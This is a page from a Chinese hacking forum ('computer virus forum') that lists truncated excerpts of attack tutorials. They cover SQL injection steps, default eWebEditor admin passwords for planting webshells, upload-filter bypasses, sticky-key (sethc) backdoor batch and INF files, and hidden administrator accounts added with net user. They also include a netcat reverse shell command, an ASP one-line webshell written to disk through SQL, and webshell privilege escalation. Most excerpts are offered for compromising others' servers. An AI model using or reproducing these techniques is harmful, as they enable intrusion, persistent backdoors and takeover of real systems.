电脑病毒论坛 今日: 0|主题: 1421|排名: 18 

如果是html格式的站我们先打开网站然后单击鼠标右键 按查看源文件-编辑-查找输入asp 看有没有网站ASP文件或ASP带参数1：注入点先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。http://site/web0day.as ...

eWebEditor编辑器 建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理 默认后台地址：/ewebeditor/admin_login.asp 使用默认密码：admin/admin 或 admin/admin888 不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb 拿webshell方法第一种方法 登陆后台点击“样式 ...

在cmd下输入以下命令... 下面再打开记事本把底下的代码粘贴进去。 复制代码代码如下: @echo off cls echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo. echo Shift后门 echo.sproink @copy c:\windows\explorer.exe c:\windows\system32\sethc.exe @copy c:\windows\system32\se ...

一、任务管理器给病毒背后一刀　　Windows任务管理器是大家对进程进行管理的主要工具，在它的“进程”选项卡中能查看当前系统进程信息。在默认设置下，一般只能看到映像名称、用户名、CPU占用、内存使用等几项，而更多如I/O读写、虚拟内存大小等信息却被隐藏了起来。可别小看了这些被隐藏的信息，当系统出现莫名 ...

一般而言，后台插一句话，如果数据库扩展名是asp的话，那么插数据库，但是如果有配置文件可以插的话，那肯定是插入配置文件了，但是插入配置文件有一个很大的风险，那就是一旦出错那么全盘皆输，有可能不仅仅造成后台无法登陆，甚至有可能是整个网站系统崩溃，所以插入配置文件，请慎之又慎。话归正题，如果想插入配置文件 ...

然而。上传目录取消了脚本执行的权限。 我想这里估计大家都要放弃了。 如何突破呢?其实是可以的. 关键是 [不修改名字] 先来看看一个上传的数据包: POST /fa-bu/upload/upfile1.asp HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, appli ...

操作步骤： 1、在自己电脑里面建立一个.txt文本文件. 2、在里面输入内容： @echo off net user xixi 123456 /add 注释：前面xixi是用户名后面123456是密码； net localgroup administrators xixi /add 3、把这个文件保存，更改后缀为xixi.bat 注释：前面名字随便，后面格式一定要是bat； 4、把这个文件拷贝到对方电脑C:\WIN ...

在肉鸡上建立一个隐藏的账户，以备需要的时候使用。账户隐藏技术可谓是最隐蔽的后门，一般用户很难发现系统中隐藏账户的存在，因此危害性很大，本文就对隐藏账户这种黑客常用的技术进行揭密。        在隐藏系统账户之前，我们有必要先来了解一下如何才能查看系统中已经存在的账户。在系统中 ...

php注入十点基本步骤 1、判断是否存在注入，加'、and 1=1、and 1=2 2、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本，可以用union查询 3、利用order by 暴字段，在网址后加 order by 10/* 如果返回正常说明字段大于10 4、再利用union来查询准确字段，如: and 1=2 union select 1,2,3,......./* 直 ...

一、在上传类型添加asp或者asa然后上传大马就好了 二、进后台在附件那上传*.asp;1.jpg，不要选择“自动命名上传文件”，上传目录是http://www.***.com/upload/*.asp;1.jpg 三、插件管理--TotoroⅡ插件，导出此插件，下载本地利用文本形式打开base64加密的，自己用一句话或小马去base64加密下替换之，修改Totoro/a ...

1、服务器在内网。 2、做了tcp/ip筛选。 先执行下面cmd命令：cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip，导出注册表里关于TCP/IP筛选的第一处cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip，导出注册表里关于TCP/IP筛选的第二处cmd /c re ...

方法一：龙儿心发明的，版本未定，估计都行。 进入后台-系统设置-Flash播放器管理 可以上传任意文件。 [includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制，直接Type=Media 上传你的webshell，访问路径为http://target/images/upload/Media/xxx.php] 方法二：另外一种是利用ecsh ...

无奈到了自己这里今天下午又碰到个一样的站 纠结··· 不多说了 首先感谢小帆同学 猪猪同学对程序代码的分析·（我自己硬是整了半个小时没整出来利用方法·） 此后台默认的账号密码是 admin admin ，  ITlearner  ITlearner 先进后台 来到修改配置界面 保存源文件到 ...

前几天搞了几个网站，之前搞的站一般不留后门，其实基本留了都被删除了，这次下决心要搞个shift后门留着自己用的，秒杀给你介绍一个方法！ 将下面的代码保存成inf文件 [Version] Signature="$WINDOWS NT$" [DefaultInstall] AddReg=My_AddReg_Name [My_AddReg_Name] HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ima ...

1、利用Sc getkeyname来获取服务的名字 首先我们可以利用 net start 来得到系统中的服务显示名称 然后我们利用 sc getkeyname 来得到服务的真实名称 这样我们就得到了服务的真实名称，然后我们利用 net stop 服务名 来停止服务 2、利用sc qc来获取服务的运行信息 利用sc qc 服务的真实名称来得到服务的启动类型，执行文件路 ...

在webshell下执行CMD，按照常规： path:c:\windows\temp\cmd.exe 查用户： Command: /c net user 这个情况是system32目录的net.exe 你能调用到。 要是调用不到，只能传文件到执行目录。 假设更cmd在同一个目录，c:\\windows\\temp\\net.exe 那就是c:\windows\temp\net.exe user或者c:\windows\temp\net.exe "user" 等等。 ...

webshell提权小技巧 cmd路径: c:\windows\temp\cmd.exe nc也在同目录下 例如反弹cmdshell： "c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe" 通常都不会成功。 而直接在 cmd路径上 输入 c:\windows\temp\nc.exe 命令输入 -vv ip 999 -e c:\windows\temp\cmd.exe 却能成功。。 这个不是重点 我们通常 执行 ...

需要什么条件，语句又是什么？网上翻不到资料。麻烦各位。 答： create table cmd (a varchar(50)) insert into cmd (a) values ('<%execute request("a")%>') select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd drop table cmd 解释如下： 1.create table a (a varchar(50)) 建立一个有一个A字 ...

一个存在备份的页面，但是一般直接访问的话都会出现 看到系统有个广告位的地方，还可以进行url地址的提交，于是就可以把备份的地址写进去即可 之后再管理广告位，直接点击那个URL地址，即可看到我们熟悉的备份页面了，O(∩_∩)O哈哈~ form：Zahirll ...

仔细看下面的图片，发现什么了吗。SU的提权可以溢出(如何防止溢出琼殿技术社区技术团队帮您解决服务器安全问题)，但是出错了。不是限制了cmd命令，注意 Recv: 530 Not logged in, home directory does not exist. 网上解释是： 一般在用户登录时出现：530 Not logged in, home directory does not exist. 意思是说用户的根 ...